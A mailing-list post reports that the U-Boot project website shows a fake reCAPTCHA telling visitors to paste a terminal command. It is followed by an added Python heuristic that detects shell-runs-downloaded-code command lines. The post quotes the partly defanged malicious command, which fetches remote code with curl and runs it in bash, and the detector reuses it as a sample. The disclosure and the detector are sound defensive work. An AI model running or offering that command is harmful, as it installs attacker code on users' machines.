U-boot.org is spreading malware
Mate Kukri
km at mkukri.xyz
Mon Feb 23 06:31:58 CET 2026
Dear Maintainers,
U-Boot.org <http://u-boot.org/> seems to be trying to social engineer visitors into executing potentially malicious code.
The website presents a seemingly fake reCAPTCHA upon visiting, which, after ticking the box, instructs the user to open their terminal and paste and execute a command from the clipboard for "verification".
Said command curl-s some text from a network server and runs it as a bash command.
I have not done much analysis on the exact behaviour of the payload, but social engineering users into executing an arbitrary local payload is not an acceptable way of doing web visitor verification.
An example of the clipboard payload I am told to execute (but did not) is (sub XXXXXXXX with microzen):
/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"; echo ""BotGuard: Answer the protector challenge. Ref: 15978
Best regards,
Mate Kukri
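
Added example, not part of the original message or of any U-Boot project code: a heuristic triage check for the command shape reported above, where a shell runs text fetched by curl, usable over clipboard contents, shell history or process command lines. The function and rule names are hypothetical, the regexes are a best-effort assumption rather than a complete detector, and the first sample is the defanged command quoted in the message.

```python
import re
import shlex

SHELL = r"(?:ba|z|da|k)?sh"
FETCH = r"(?:curl|wget)"

# Rule name -> pattern for a command line that runs downloaded text as shell code.
RULES = {
    "shell -c on a command substitution of a download":
        re.compile(rf"\b{SHELL}\s+-c\s+[\"']?\s*(?:\$\(|`)\s*{FETCH}\b"),
    "download piped into a shell":
        re.compile(rf"\b{FETCH}\b[^|]*\|\s*(?:sudo\s+)?{SHELL}\b"),
    "eval of a downloaded string":
        re.compile(rf"\beval\s+[\"']?\s*(?:\$\(|`)\s*{FETCH}\b"),
}
# curl short options that consume the next argument (so it is not the URL).
TAKES_VALUE = {"-A", "-H", "-o", "-d", "-X", "-e", "-u", "-x"}
FETCH_CALL = re.compile(rf"\b{FETCH}\b([^|)`;]*)")

# Defanged command as quoted in the message (host left as XXXXXXXX).
PAGE_SAMPLE = r'''/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"'''


def matched_rules(cmd):
    """Return the names of all rules that the command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def fetch_targets(cmd):
    """Return the non-option arguments (URLs/hosts) of each curl/wget call."""
    targets = []
    for m in FETCH_CALL.finditer(cmd):
        try:
            args = shlex.split(m.group(1))
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            args = m.group(1).split()
        skip = False
        for a in args:
            if skip:
                skip = False          # value of the previous option
            elif a in TAKES_VALUE:
                skip = True
            elif not a.startswith("-"):
                targets.append(a)
    return targets


def triage(cmd):
    """Flag the command and list what it fetches, for blocking or hunting."""
    rules = matched_rules(cmd)
    return {"suspicious": bool(rules), "rules": rules,
            "targets": fetch_targets(cmd) if rules else []}
```

Calling `triage(PAGE_SAMPLE)` flags the reported command and returns the fetched host and path, while a plain `curl -o file URL` download is not flagged.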